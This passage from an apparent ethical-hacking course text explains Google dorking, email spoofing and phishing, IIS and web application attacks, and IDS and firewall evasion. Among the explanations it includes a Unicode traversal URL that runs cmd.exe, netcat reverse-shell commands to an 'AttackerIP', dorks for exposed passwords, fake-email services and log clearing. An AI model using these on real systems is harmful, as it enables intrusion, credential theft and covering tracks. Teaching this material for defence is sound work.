operators, which we‘ll discuss in a moment. There is a fairly effective way to get more
than 10 search terms crammed into a query: Replace Google‘s ignored terms with the
wildcard character (*). Google does not count the wildcard character as a search term,
allowing you to extend your searches quite a bit.
Basic Searching
Google searching is a process, the goal of which is to find information about a topic. The process
begins with a basic search, which is modified in a variety of ways until only the pages of relevant
information are returned. Google‘s ranking technology helps this process along by placing the
highest-ranking pages on the first results page. The details of this ranking system are complex and
somewhat speculative, but suffice it to say that for our purposes Google rarely gives us exactly
what we need following a single search.
Using Boolean Operators and Special Characters
More advanced than basic word searches, phrase searches are still a basic form of a Google query.
To perform advanced queries, it is necessary to understand the Boolean operators AND, OR, and
NOT. To properly segment the various parts of an advanced Google query, we must also explore
visual grouping techniques that use the parenthesis characters. Finally, we will combine these
techniques with certain special characters that may serve as shorthand for certain operators,
wildcard characters, or placeholders. Boolean operators help specify the results that are
returned from a query. If you are already familiar with Boolean operators, take a moment to skim
this section to help you understand Google‘s particular implementation of these operators, since
many search engines handle them in different ways. Improper use of these operators could
drastically alter the results that are returned.
The most commonly used Boolean operator is AND. This operator is used to include multiple
terms in a query. For example, a simple query like hacker could be expanded with a Boolean
operator by querying for hacker AND cracker. The latter query would include not only pages that
talk about hackers but also sites that talk about hackers and the snacks they might eat. Some search
engines require the use of this operator, but Google does not. The term AND is redundant to
Google. By default, Google automatically searches for all the terms you include in your query.
The plus symbol (+) forces the inclusion of the word that follows it. There should be no space
following the plus symbol.
Another common Boolean operator is NOT. Functionally the opposite of the AND operator, the
NOT operator excludes a word from a search. One way to use this operator is to preface a search
word with the minus sign (–). Be sure to leave no space between the minus sign and the search
term. Consider a simple query such as hacker. This query is very generic and will return hits for all
sorts of occupations, like golfers, woodchoppers, serial killers, and those with chronic bronchitis.
With this type of query, you are most likely not interested in each and every form of the word
hacker but rather a more specific rendition of the term. To narrow the search, you could include
more terms, which Google would automatically AND together, or you could start narrowing the
search by using NOT to remove certain terms from your search.
Google Advanced Operators:
Introduction
Beyond the basic searching techniques explored in the previous chapter, Google offers special
terms known as advanced operators to help you perform more advanced queries.These operators,
when used properly, can help you get to exactly the information you‘re looking for without
spending too much time poring over page after page of search results. When advanced operators
are not provided in a query, Google will locate your search terms in any area of the Web page,
including the title, the text, the URL, or the like.We take a look at the following advanced operators
in this chapter:
(a) intitle, allintitle
(b) inurl, allinurl
(c) filetype
(d) allintext
(e) site
(f) link
(g) inanchor
(h) daterange
(i) cache
(j) info
(k) related
(l) phonebook
(m) rphonebook
(n) bphonebook
(o) author
(p) group
(q) msgid
(r) insubject
(s) stocks
(t) define
Operator Syntax
An advanced operator is nothing more than a part of a query. You provide advanced operators to
Google just as you would any other query. In contrast to the somewhat free-form style of standard
Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The
basic syntax of a Google advanced operator is operator:search_term. When using advanced
operators, keep in mind the following:
There is no space between the operator, the colon, and the search term. Violating this
syntax can produce undesired results and will keep Google from understanding the
advanced operator. In most cases, Google will treat a syntactically bad advanced operator
as just another search term.
For example, providing the advanced operator intitle without a following colon and
search term will cause Google to return pages that contain the word intitle.
The search term is the same syntax as search terms we covered in the previous chapter.
For example, you can provide as a search term a single word or a phrase surrounded
by quotes. If you provide a phrase as the search term, make sure there are no spaces
between the operator, the colon, and the first quote of the phrase.
Boolean operators and special characters (such as OR and +) can still be applied to
advanced operator queries, but be sure not to place them in the way of the separating colon.
Advanced operators can be combined in a single query as long as you honor both the basic
Google query syntax as well as the advanced operator syntax. Some advanced operators
combine better than others, and some simply cannot be combined.
The ALL operators (the operators beginning with the word ALL) are oddballs. They are
generally used once per query and cannot be mixed with other operators.
Google‘s Advanced Operators
Intitle and Allintitle: Search Within the Title of a Page
Allintext: Locate a String Within the Text of a Page
Inurl and Allinurl: Finding Text in a URL
Site: Narrow Search to Specific Sites
Filetype: Search for Files of a Specific Type
Link: Search for Links to a Page
Inanchor: Locate Text Within Link Text
Cache: Show the Cached Version of a Page
Numrange: Search for a Number
Daterange: Search for Pages Published Within a Certain Date Range
Info: Show Google‘s Summary Information
Related: Show Related Sites
Author: Search Groups for an Author of a Newsgroup Post
Group: Search Group Titles
Insubject: Search Google Groups Subject Lines
Msgid: Locate a Group Post by Message ID
Stocks: Search for Stock Information
Define: Show the Definition of a term
Phonebook: Search Phone Listings
Google Hacking Basics:
Anonymity with Caches
Google‘s cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or
document, you can almost always count on getting a copy of it, even if the original source has since
dried up and blown away. Of course the down side of this is that hackers can get a copy of your
sensitive data even if you‘ve pulled the plug on that pesky Web server. Another down side of the
cache is that the bad guys can crawl your entire Web site (including the areas you ―forgot‖ about)
without even sending a single packet to your server. If your Web server doesn‘t get so much as a
packet, it can‘t write anything to the log files. If there‘s nothing in the log files, you might not have
any idea that your sensitive data has been carried away. It‘s sad that we even have to think in these
terms, but untold megabytes, gigabytes, and even terabytes of sensitive data leak from Web servers
every day. Understanding how hackers can mount an anonymous attack on your sensitive data via
Google‘s cache is of utmost importance. Google grabs a copy of most Web data that it crawls.
There are exceptions, and this behavior is preventable.
Google as a Proxy Server
Although this technique might not work forever, at the time of this writing it‘s possible to use
Google itself as a proxy server. This technique requires a Google translated URL and some
minor URL modification. To make this work, we first need to generate a translation URL. The
easiest way to do this is through Google‘s translation service, located at
www.google.com/translate_t. If you were to enter a URL into the ―Translate a web page‖ field,
select a language pair, and click the Translate button, Google would translate the contents of the
Web page and generate a translation URL that could be used for later reference. Langpair
parameter, which is only available for the translation service, describes which languages to
translate to and from, respectively. The arguments to this parameter are identical to the hl
parameters. What would happen if we were to translate a page from one language into the same
language? This would change our translation URL to:
http://www.google.com/translate?u=http%3A%2F%2Fwww.google.com&langpair=en%7Ce
n&hl=en&ie=Unknown&oe=ASCII
If we loaded this URL into our browser, and if the source page were in English to begin with, we
would see a page. First, you should notice that the Google search page in the bottom frame of the
browser window looks pretty familiar. In fact, it looks identical to the original search page. This is
because no real language translation occurred. The top frame of the browser window shows the
standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to
show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately,
there is a payoff when we consider what happens behind the scenes. Let‘s look at another example,
this time translating the www.phrack.org/hardcover62/ Web page, monitoring network traffic
with tcpdump -n -U -t. This is not a perfect proxy solution and should not be used as the sole
proxy server in your toolkit. We present it simply as a example of what a little creative thinking
can accomplish. While Google is acting as a proxy server, it is a transparentproxy server, which
means the target Web site can still see our IP address in the connection logs, despite the fact that
Google grabbed the page for us.
Directory Listings
A directory listing is a type of Web page that lists files and directories that exist on a Web server.
Designed to be navigated by clicking directory links, directory listings typically have a title that
describes the current directory, a list of files and directories that can be clicked, and often a footer
that marks the bottom of the directory listing. Much like an FTP server, directory listings offer a
no-frills, easy-install solution for granting access to files that can be stored in categorized folders.
Unfortunately, directory listings have many faults, specifically:
They are not secure in and of themselves. They do not prevent users from downloading
certain files or accessing certain directories. This task is often left to the protection
measures built into the Web server software or third-party scripts, modules, or programs
designed specifically for that purpose.
They can display information that helps an attacker learn specific technical details about
the Web server.
They do not discriminate between files that are meant to be public and those that are
meant to remain behind the scenes.
They are often displayed accidentally, since many Web servers display a directory listing
if a top-level index file (index.htm, index.html, default.asp, and so on) is missing or
invalid.
All this adds up to a deadly combination.
Locating Directory Listings
The most obvious way an attacker can abuse a directory listing is by simply finding it! Since
directory listings offer ―parent directory‖ links and allow browsing through files and folders, even
the most basic attacker might soon discover that sensitive data can be found by simply locating the
listings and
Browsing through them. Locating directory listings with Google is fairly straightforward. An
obvious query to find page might be intitle:index.of, which could find pages with the term index of
in the title of the document. Remember that the period (―.‖) serves as a single-character wildcard in
Google. Unfortunately, this query will return a large number of false positives such as pages with
the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these Web pages
intentional, they are also not the type of directory listings we are looking for.
Finding Specific Directories
In some cases, it might be beneficial not only to look for directory listings but to look for directory
listings that allow access to a specific directory. This is easily accomplished by adding the name of
the directory to the search query. To locate ―admin‖ directories that are accessible from directory
listings, queries such as intitle:index.of.admin or intitle:index.of inurl:admin will work well.
Finding Specific Files
Because of the directory tree style, it is also possible to find specific files in a directory listing. For
example, to find WS_FTP log files, try a search such as
intitle:index.of ws_ftp.log.This technique can be extended to just about any kind of file by keying
in on the index.of in the title and the filename in the text of the Web page. You can also use
filetype and inurl to search for specific files. To search again for ws_ftp.log files, try a query like
filetype:log inurl:ws_ftp.log. This technique will generally find more results than the somewhat
restrictive index.of search.
Server Versioning
One piece of information an attacker can use to determine the best method for attacking a Web
server is the exact software version. An attacker could retrieve that information by connecting
directly to the Web port of that server and issuing a request for the HTTP (Web) headers. It
is possible, however, to retrieve similar information from Google without ever connecting to the
target server. One method involves using the information provided in a directory listing. Notice
that some directory listings provide the name of the server software as well as the version
number. An adept Web administrator could fake these server tags, but most often this information
is legitimate and exactly the type of information an attacker will use to refine his attack against the
server. The Google query used to locate servers this way is simply an extension of the
intitle:index.of query. intitle:index.of “ server at” query will locate all directory listings on the
Web with index of in the title and server at anywhere in the text of the page. This might not seem
like a very specific search, but the results are very clean and do not require further refinement. To
search for a specific server version, the intitle:index.of query can be extended even further to
something like intitle:index.of “Apache/1.3.27 Server at”. In addition to identifying the Web
server version, it is also possible to determine the operating system of the server (as well as
modules and other software that is installed).
Traversal Techniques
Attackers use traversal techniques to expand a small foothold into a larger compromise.The query
intitle:index.of inurl:“/admin/*” is helped to traversal.
Site Operator
The site operator is absolutely invaluable during the information-gathering phase of an assessment.
Site search can be used to gather information about the servers and hosts that a target hosts. Using
simple reduction techniques, you can quickly get an idea about a target‘s online presence. Consider
the simple example of site:washingtonpost.com –site:www.washingtonpost.com. This query
effectively locates pages on the washingtonpost.com domain other than www.washingtonpost.com
login | logon
Login portals can reveal the software and operating system of a target, and in many cases ―self-
help‖ documentation is linked from the main page of a login portal. These documents are designed
to assist users who run into problems during the login process. Whether the user has forgotten his
or her password or even username,this document can provide clues that might help an attacker.
Documentation linked from login portals lists e-mail addresses, phone numbers, or URLs of human
assistants who can help a troubled user regain lost access.
admin | administrator
The word administrator is often used to describe the person in control of a network or system. The
word administrator can also be used to locate administrative login pages, or login portals. The
phrase Contact your system administrator is a fairly common phrase on the Web, as are several
basic derivations. A query such as ―please contact your * administrator‖ will return results that
reference local, company, site, department, server, system, network, database,e-mail, and even
tennis administrators. If a Web user is said to contact an administrator, chances are that the data has
at least moderate importance to a security tester.
Searching for Passwords
Password data, one of the ―Holy Grails‖ during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate passwords on the Web.
Google Hacking Database
The Google Hacking Database (GHDB) contains queries that identify sensitive data such as portal
logon pages, logs with network security information, and so on. Visit http://johnny.ihackstuff.com
Windows Registry Entries Can RevealPasswords
Query like filetype:reg intext: “internet account manager” could reveal interesting keys containing
password data.
6. EMAIL ATTACKS
Working of Emails:
Email sending and receiving is controlled by the Email servers. All Email service providers
configure Email Server before anyone can Sign into his or her account and start communicating
digitally. Once the servers are ready to go, users from across the world register in to these Email
servers and setup an Email account. When they have a fully working Email account, they sign into
their accounts and start connecting to other users using the Email services.
Email Travelling Path:
Let‘s say we have two Email providers, one is Server1.com and other is Server2.in, ABC is a
registered user in Server1.com and XYZ is a registered user in server2.in. ABC signs in to his
Email account in Server1.com, he then writes a mail to the [email protected] and click on Send and
gets the message that the Email is sent successfully. But what happens behind the curtains, the
Email from the computer of [email protected] is forwarded to the Email server of Server1.com.
Server1 then looks for server2.in on the internet and forwards the Email of the server2.in for the
account of XYZ. Server2.in receives the Email from server1.com and puts it in the account of
XYZ. XYZ then sits on computer and signs in to her Email account. Now she has the message in
her Email inbox.
www.syngress. www.syngress.
SERVER1.com
SERVER2.in
ISP
[email protected] [email protected]
Email Service Protocols:
SMTP
SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is
delivered from an Email client, such as Outlook Express, to an Email server or when
Email is delivered from one Email server to another. SMTP uses port 25.
POP3
POP3 stands for Post Office Protocol. POP3 allows an Email client to download an
Email from an Email server. The POP3 protocol is simple and does not offer many
features except for download. Its design assumes that the Email client downloads all
available Email from the server, deletes them from the server and then disconnects. POP3
normally uses port 110.
IMAP
IMAP stands for Internet Message Access Protocol. IMAP shares many similar
features with POP3. It, too, is a protocol that an Email client can use to download Email
from an Email server. However, IMAP includes many more features than POP3. The
IMAP protocol is designed to let users keep their Email on the server. IMAP requires
more disk space on the server and more CPU resources than POP3, as all Emails are
stored on the server. IMAP normally uses port 143.
Email Server Configuration:
Email server software like Postcast Server, Hmailserver, SurgEmail, etc can be used to convert
your Desktop PC into an Email sending server. HMailServer is an Email server for Microsoft
Windows. It allows you to handle all your Email yourself without having to rely on an Internet
service provider (ISP) to manage it. Compared to letting your ISP host your Email, HMailServer
adds flexibility and security and gives you the full control over spam protection.
Email Security:
Now let‘s check how secure this fast mean of communication is. There are so many attacks which
are applied on Emails. There are people who are the masters of these Email attacks and they always
look for the innocent people who are not aware of these Email tricks and ready to get caught their
trap. You have to make sure that you are not an easy target for those people. You have to secure
your mail identity and profile, make yourself a tough target. If you have an Email Id Do not feel
that it does not matters if gets hacked because there is no important information in that Email
account, because you do not know if someone gets your
Email id password and uses your Email to send a threatening Email to the Ministry or to the News
Channels. Attacker is not bothered about your data in the Email. He just wants an Email ID Victim
which will be used in the attack. There are a lots of ways by which one can use your Email in
wrong means, i am sure that you would have come across some of the cased where a student gets
an Email from his friends
Abusing him or cases on Porn Emails where the owner of the Email does not anything about the
sent Email.
Email Spoofing:
Email spoofing is the forgery of an Email header so that the message appears to have originated
from someone or somewhere other than the actual source. Distributors of spam often use spoofing
in an attempt to get recipients to open, and
possibly even respond to, their solicitations. Spoofing can be used legitimately. There are so many
ways to send the Fake Emails even without knowing the password of the Email ID. The Internet is
so vulnerable that you can use anybody's Email ID to send a threatening Email to any official
personnel.
Fake Email- Open Relay Server:
An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server configured in such a way
that it allows anyone on the Internet to send Email through it, not just mail destined ‗To‘ or
‗Originating‘ from known users. An Attacker can connect the Open Relay Server via Telnet and
instruct the server to send the Email. Open Relay Email Server requires no password to send the
Email.
Fake Email- Web Script:
Web Programming languages such as PHP and ASP contain the mail sending functions which can
be used to send Emails by programming Fake headers i.e.‖ From: To: Subject:‖ There are so many
websites available on the Internet which Already contains these mail sending scripts. Most of them
provide the free service. Some of Free Anonymous Email Websites are:
Mail.Anonymizer.name (Send attachments as well)
FakEmailer.net
FakEmailer.info
Deadfake.com
Fake Email- Consequences:
Email from your Email ID to any Security Agency declaring a Bomb Blast can make you
spend rest of your life behind the iron bars.
Email from you to your Girl friend or Boy friend can cause Break-Up and set your
friend‘s to be in relationship.
Email from your Email ID to your Boss carrying your Resignation Letter or anything else
which you can think of.
There can be so many cases drafted on Fake Emails.
Fake Email- Proving:
Every Email carry Header which has information about the Travelling Path of the Email.
Check the Header and Get the location from the Email was Sent.
Check if the Email was sent from any other Email Server or Website.
Headers carry the name of the Website on which the mail sending script was used.
Email Bombing:
Email Bombing is sending an Email message to a particular address at a specific victim site. In
many instances, the messages will be large and constructed from meaningless data in an effort to
consume additional system and network resources. Multiple accounts at the target site may be
abused, increasing the denial of service impact.
Email Spamming:
Email Spamming is a variant of Bombing; it refers to sending Email to hundreds or thousands of
users (or to lists that expand to that many users). Email spamming can be made worse if recipients
reply to the Email, causing all the original addressees
to receive the reply. It may also occur innocently, as a result of sending a message to mailing lists
and not realizing that the list explodes to thousands of users, or as a result of a responder message
(such as vacation(1)) that is setup incorrectly.
Email Password Hacking:
There is no specified attack available just to hack the password of Email accounts. Also, it is not so
easy to compromise the Email server like Yahoo, Gmail, etc. Email Password Hacking can be
accomplished via some of the Client Side Attacks. We try to compromise the user and get the
password of the Email account before it reaches the desired Email server.
Phishing Attack
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in
an attempt to scam the use into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information,
such as passwords and credit card, social security, and bank account numbers, that the legitimate
organization already has. The Web site, however, is Bogus and set up only to steal the User‘s
information.
Phishing Scams could be
Emails inviting you to Join a Social Group, asking you to Login using your Username
and Password.
Email saying that Your Bank Account is locked and Sign in to your Account to Unlock
IT.
Emails containing some Information of your Interest and asking you to Login to Your
Account.
Any Email carrying a Link to Click and Asking you to Login
Prevention against Phishing
Read all the Email Carefully and Check if the Sender is Original.
Watch the Link Carefully before Clicking.
Always check the URL in the Browser before Signing IN to your Account.
Always Login to Your Accounts after opening the Trusted Websites, not by clicking in
any other Website or Email.
Email Tracing:
Tracing an Email means locating the Original Sender and Getting to know the IP address of the
network from which the Email was actually generated. To get the information about the sender of
the Email we first must know the structure of the Email. As we all know the travelling of the
Email. Each message has exactly one header, which is structured into fields. Each field has a name
and a value. Header of the Email contains all the valuable information about the path and the
original sender of the Email.
Check the headers in differ Email Service Providers.
Locating the Sender.
You can easily get the IP Address of the sender from the header and then can locate
the sender.
Once you have the IP Address of the sender, go to the URLwww.ip2location.com and
Find the location of the IP Address.
Securing Your Email Account:
Always configure a Secondary Email Address for the recovery Purpose.
Properly configure the Security Question and Answer in the Email Account.
Do Not Open Emails from strangers.
Do Not Use any other‘s computer to check your Email.
Take Care of the Phishing Links.
Do not reveal your Passwords to your Friends or Mates
7. WEBSITE ATTACKS
Hacking Web Servers
Web hacking is a critical topic because much of the Internet is devoted to e-commerce. This traffic
is typically allowed through a firewall or border router, so there is considerable risk involved.
Web Server Identification
While standard web servers run on ports 80 (HTTP) or 443 (HTTPS), there are other ports that
should be scanned for when looking for web-based applications. These include the following:
88 – Kerberos
2779 - Windows 2000 Web Server
8080 – Squid
8888 – Alternate Web Server
Some of the most popular tools used to scan for these services include: Nmap, Netscan
Tools and Superscan.
Web Server Enumeration
Once possible web servers have been identified, the attacker will usually attempt to enumerate the
web server vendor. The most popular web servers include: IIS Web Server, Apache Web Server
and Sun ONE Web Server. Common tools used to determine what the web server is running
include: Nmap, Telnet, and web sites such as Netcraft.
Vulnerability Identification
Once the attacker has identified the vendor and version of the web server, he will then search for
vulnerabilities. Some of the sites the attacker and security administrators would most likely visit to
identify possible vulnerabilities include:
http://www.packetstormsecurity.com
http://icat.nist.gov/icat.cfm
http://neworder.box.sk
The security administrator should also consider running an automated vulnerability scanning
software package. Several of these are worth mentioning: WebInspect, Whisker, N-Stealth
Scanner, Nessus and Shadow Security Scanner.
Vulnerability Exploitation
IIS may seem to be the target of many attacks, but this is partially due to the fact that it is so widely
used. Others such as Apache, have also been targeted for attack and have their share of
vulnerabilities. Attackers will take the least path of resistance. If this happens to be the web server,
expect it to be targeted. Some common exploits are discussed below.
ISAPI DLL Buffer Overflows
This exploit targets idq.dll. When executed, this attack can lead to a buffer overflow that can
compromise servers running IIS. What makes this vulnerability particular malicious is that the
service, part of IIS Indexing, does not even need to be running. Because the idq.dll runs as
system, the attacker can easily escalate his privilege and add himself to the administrator‘s group.
IPP Printer Overflow
This buffer overflow attack also targets the ISAPI filter (mws3ptr.dll) that handles printer files. If
the buffer is sent at least 420 characters, it will overflow and may potentially return a command
prompt to the attacker. There are several tools available to exploit this vulnerability; jill-win32
is an example of one.
ISAPI DLL Source Disclosure
Because of vulnerabilities in the ISM.dll, IIS4 and IIS5 can be made to disclose source data, rather
than executing it. An attacker accomplishes this by appending +.htr to the global .asa file.
IIS Directory Traversal
This vulnerability allows an attacker to back out of the current directory and go wherever he would
like within the logical drive‘s structure. Two iterations of this attack are:
Unicode
Double Decode
These attacks are possible because of the way in which the Unicode is parsed. These overly long
strings (as shown below) bypass the filters that are designed to only check short Unicode.
http://target//vulnerablefolder/..%c0%af..%c0%af..%c0%af..%c%af../winnt/system32/cmd.
exe?/c+dir+c:\
Directory Listing
The attacker can then place this Unicode string in the browser or script the attack with a tool such
as NetCat. If the attacker can access cmd.exe, he is only a few steps away from owning the box.
Back in 2001, the Nimda worm used this same vulnerability to ravage web servers.
Shoveling the Shell
For the final step, the attacker needs only to complete the following two steps. At that point, a
command shell will be returned to his computer with system privileges.
Execute nc.exe -l -p <Open Port> from the attacker‘s computer.
Execute nc.exe -v -e cmd.exe AttackerIP <Open Port> from the compromised server.
Escalating Privileges on IIS
Some well-known privilege escalation tools are: GetAdmin, HK, PipeupAdmin and IIScrack.dll
(httpodbc.dll). This completes the system hack, as the attacker now has administrator privileges on
the computer.
Clearing IIS Logs
Just as with any other attack, expect the attacker to attempt to remove or alter the log files located
at C:\Winnt\system32\Logfiles\W3SVC1, as they will most likely have a record of the attacker‘s
IP address.
File System Traversal Countermeasures
Countermeasures include:
Apply current patches
Move cmd.exe
Separate the OS and Applications by using two logical partitions
Remove executable permissions from the IUSR account
Securing IIS
As always, the best defense is a good offense. So, there is never going to be a better time than now
to make sure your web server is locked down. There are some good tools available for you to
accomplish this task.
UpdateExpert
Microsoft HotFix Checker
IIS Lockdown
Microsoft Baseline Security Analyzer
Calcs
Web Application Vulnerabilities
Footprinting
The methodology for assessing web applications is the same as all of the other services we have
examined. The attacker will attempt to gather as much information as possible about the site, as to
understand its function, design, and purpose. One good tool that can be used to gather information
is Instant Source.
Directory Structure
The most efficient way to determine the directory structure is with the use of a site ripping tool.
Site ripping tools allow the attacker to download the entire site locally. Once the site has been
duplicated, the attacker can start to examine the directory structure, make an analysis of the site
design, perform source sifting, and look for clues that can identify the type of underlying web
applications. Some excellent site ripping tools include: Wget, Black Widow and WebSleuth.
Documenting the Application Structure
Once the underlying applications have been uncovered, the attacker can then search the web to
look for vulnerabilities. If vulnerabilities are present, the attacker will also check the web
application vendors‘ web site. Many times, vendors are so proud of their products, they will list all
of their clients. This list of clients can be used to immediately target other vulnerable web sites.
Input Validation
Another huge problem with web applications is that of client-side data. Any time data is passed
from the client to the server, it must be checked. Without proper input validation, the web
application can be tricked into accepting invalid input.
Hidden Value Fields
Hidden value fields are embedded inside of the html code. The theory is that if end users cannot
see it, it is safe from tampering. The flaw in that logic is that anyone that views the page source
can see the hidden fields. Many sites use these hidden value fields to store the price of the product
that is passed to the web application. If the attacker saves the web page locally and then modifies
the amount, the new value will be passed to the web application. If no input validation is
performed, the application will accept the new, manipulated value.
Cross Site Scripting
Another popular web application hack is cross-site scripting. Web applications that use cookies
and fail to properly identify the user are potentially vulnerable. Sending the victim an e-mail with
a malicious link embedded is the way this attack is committed. Victims that fall for the ruse and
click on the link will have their credentials stolen. Sites running PHPnuke have been particularly
hard hit by this attack.
Cross-Site Scripting Countermeasures
This attack, like others, can be prevented. Consider the following:
Patch the program
Validate all input that your dynamic page receives
Be leery of embedded links
Disable scripting language support
Web Based Password Cracking Techniques
Authentication Types
Authentication types include:
Basic
Message Digest
Certificate
Microsoft Passport
Forms Based
You should be familiar with the details of each of these authentication types.
Web-based Password Cracking
There are an unlimited number of tools available to the attacker to attempt to break into web-based
applications. If the site does not employ a lockout policy, it is only a matter of time and bandwidth
before the attacker can gain entry. Some of these password cracking tools are: WebCracker,
Brutus, ObiWan, Munga, Bunga, Variant and PassList.
Stealing Cookies
If the attacker can gain physical access to the victim‘s computer, then there are various tools that
can be used to steal cookies or to view hidden passwords. These include the following:
CookieSpy and SnadBoy.
Buffer Overflows
Poorly written programs and the lack of boundary checking can cause buffer overflows. Anytime
bad data can be entered into an application that causes it to crash, blue screen, or drop to
root prompt, there‘s a problem! Buffer overflows can result in:
Attackers being able to run their code in privileged mode access
Freezing, rebooting, data corruption, or lockup of the attacked system
Exploitation
Many of today‘s most popular attacks are the result of buffer overflows. These include:
Jill-Win32 – IIS Buffer Overflow Attack
SQL2.exe – SQL Buffer Overflow Attack
WSFTP – DoS Buffer Overflow Attack
Named NXT – BIND Buffer Overflow Attack
While you may never write a buffer overflow program, you should be familiar with its structure.
Detecting Buffer Overflows
There are two primary ways to detect buffer overflows:
Proactive - Have an experienced programmer examine the code to verify it is written
correctly;
Reactive – Release a faulty program and wait until the attacker attacks the application by
feeding it long strings of data and observing its reaction.
Skills Required to Exploit Buffer Overflows
The skills required to exploit a buffer overflow include:
Knowledge of the Stack
Assembly Language
C Programming
The ability to guess key parameters
Defense Against Buffer Overflows
The best defense against buffer overflows is to start with a robust and secure program. Safer C
program calls should be used and the finished code should be audited. When dealing with pre-
compiled programs, you should always make sure the latest patches are applied and that the
program is executed at the least possible privilege.
Tools for Compiling Programs Robust Code
Some of the tools that are available to insure robust code include:
StackGuard
Immunix
IDS, Firewalls & Honeypots
Intrusion Detection Systems
IDS systems can be software or hardware based. While some are simple software applications,
others are high-end hardware based products. No matter what the platform, they share a common
purpose, which is to monitor events on hosts or networks and notify security administrators in
the event of an anomaly. IDS systems come in two basic types:
Anomaly Detection
Signature Recognition.
Anomaly Detection
This method of monitoring works by looking for traffic that is outside the bounds of normal
traffic. While this works well, it can be fooled by slowly changing traffic patterns. This can
sometimes fool the IDS into believing the illicit traffic is acceptable.
Signature Recognition
This method of monitoring works by comparing traffic to known attack signatures. It is as
effective as its most current update. It cannot detect an attack that is not in its database. While
signature and anomaly based IDS systems are the most commonly deployed types, other hybrid
IDS systems, such as honeypots, can be useful tools in detecting potential security breaches.
IDS Signature Matching
Signature matching works by capturing traffic and examining it to make sure that it complies with
known:
Protocol Stack Rules
Application Protocol Rules
IDS Software Vendors
There are many vendors for IDS systems. As a security administrator, your biggest concern should
be who will watch over and administrate the IDS. As once stated, ―IDS systems are like 3-year
old children as they require constant attention.‖ If you are not able to provide that amount of
attention and manpower, consider outsourcing the task to a qualified third party. Some well-known
IDS products include: SNORT, Cybercop, RealSecure and BlackIce.
Evading IDS
An attacker can use a host of programs to attempt to evade an IDS. He may even encrypt his data
to prevent an IDS from analyzing its content. Some of the tools an attacker may use to try and fool
an IDS include: Fragrouter, TCPReplay, SideStep, NIDSbench and ADMutate.
Hacking Through Firewalls
Firewalls function primarily by one of the three following methods:
Packet Filtering
NAT
Proxy
While it is not always possible to hack through firewalls, there are tools and techniques available to
determine their manufacturer, presence, and rule set. There are also ways to detect firewalls. As
an example, whenever you perform a traceroute and notice that the two final hops show the same
IP address, it‘s probable that you are dealing with a stateful inspection firewall. At this point, you
may want to try to connect. Many firewalls will divulge their presence by simply connecting to
them. Use tools such as Telnet and FTP to attempt a banner grab from the firewall. Tools such as
firewalk can be used to further enumerate the firewall‘s rule set. Firewalk works by tweaking
the IP TTL value, so that packets expire one hop beyond the gateway. Finally, Nmap is
another valuable tool that shouldn‘t be overlooked. It too, can be used to attempt enumeration of
the firewall. Nmap‘s reported results, be it open, closed, or filtered, can tell the attacker a lot
about the firewall‘s architecture. Filtered messages are commonly returned when Nmap receives
an ICMP type 3 Code 13 response. Reference RFC 792 to learn more about how ICMP functions.
http://www.faqs.org/rfcs/rfc792.html
Placing Backdoors Behind Firewalls
A much easier technique than hacking through the firewall, is to simply place a backdoor behind it.
Firewalls cannot deny what they must permit. There will usually be several ports open for the
skilled attacker to use. These include:
UDP 53 – DNS
TCP 25 - SMTP
TCP 80 – HTTP
ICMP 0/8 – Ping
Hiding Behind Covert Channels
Using one of these open ports is a good way for the attacker to covertly send data out of the
organization. Some of the tools commonly used here include:
NetCat – Can use any TCP/UDP open port
CryptCat – Same as NetCat, but carries the payload in an encrypted format
ACK CMD - Uses TCP ACK‘s as a covert channel
Loki – Uses ICMP as a covert channel. Looks like common ping traffic
Reverse WWW Shell – Uses HTTP as a covert channel
Honeypots
Honeypots are systems that contain phony files, services, and databases. They are deployed to
distract the attacker from the real target and give the administrator enough time to be alerted. For
these lures to be effective, they must adequately persuade the attacker that he has discovered a real
system. Products such as Network Associates‘ CyberCop Sting, simulate an entire network,
including routers and hosts that are actually all located on a single computer.
Honeypot Vendors
There are many honeypot vendors. The two most important issues with honeypots are entrapment
and enticement. Some honeypot vendors are listed below for your review. Each link offers good
information about this fascinating subject.
Deception Toolkit - http://www.all.net/dtk/index.html
HoneyD - http://www.citi.umich.edu/u/provos/honeyd/
LaBrea Tarpit - http://www.hackbusters.net
ManTrap - http://www.symantec.com
Single-Honeypot - http://www.sourceforge.net/projects/single-honeypot/
Smoke Detector - http://palisadesys.com/products/smokedetector/
Specter - http://www.specter.ch
Cryptography
PKI
Public key infrastructure provides a variety of valuable security services, such as key
management, authorization, and message integrity through the use of digital signatures. PKI
also extends a fourth basic feature to the security triad, that of non-repudiation:
Confidentiality
Integrity
Authentication
Non-repudiation
X.509 is one of the key standards that govern the use of PKI.
Digital Certificates
A digital certificate is a record used for authentication and encryption. It serves as a basic
component of PKI. RSA is the default encryption standard used with digital certificates and when
the certificate is requested from a CA (Certificate Authority), the request is comprised of the
following four fields:
The DN (Distinguished Name) of the CA
The Public key of the user
Algorithm identifier
The user‘s Digital signature
RSA is a public key cryptosystem in which one key is used for encryption (public key) and the
other is used for decryption (private key). RSA (Rivest Shamir Adleman) was developed in 1977
to help secure Internet transactions.
Hashing Algorithms
Hashing algorithms can be used for digital signatures or to verify the validity of a file. It is a one-
way process and is widely used.
MD5 – 128 bit message digest
SHA - 160 bit message digest
SSL
Netscape developed SSL (Secure Sockets Layer) and almost all browsers and web servers support
it. SSL‘s focus is on securing web transactions. The client is responsible for creating the session
key after the server‘s identity has been verified. SSL is limited in strength by the cryptographic
tools on which it is based.
PGP
PGP (Pretty Good Privacy) is a public encryption package that allows individuals to encrypt e-
mail and other personal data.
SSH
SSH (Secure Shell) is an excellent replacement for Telnet and FTP. It operates on port 22 and is
available in two versions: SSH and SSH2.
Session Hijacking
Spoofing Vs Hijacking
Spoofing is the act of masquerading as another user, whereas session hijacking attempts to
attack and take over an existing connection. The attacker will typically intercept the established
connection between the authorized user and service. The attacker will then take over the session
and assume the identity of the authorized user. Session hijacking attacks can range from basic
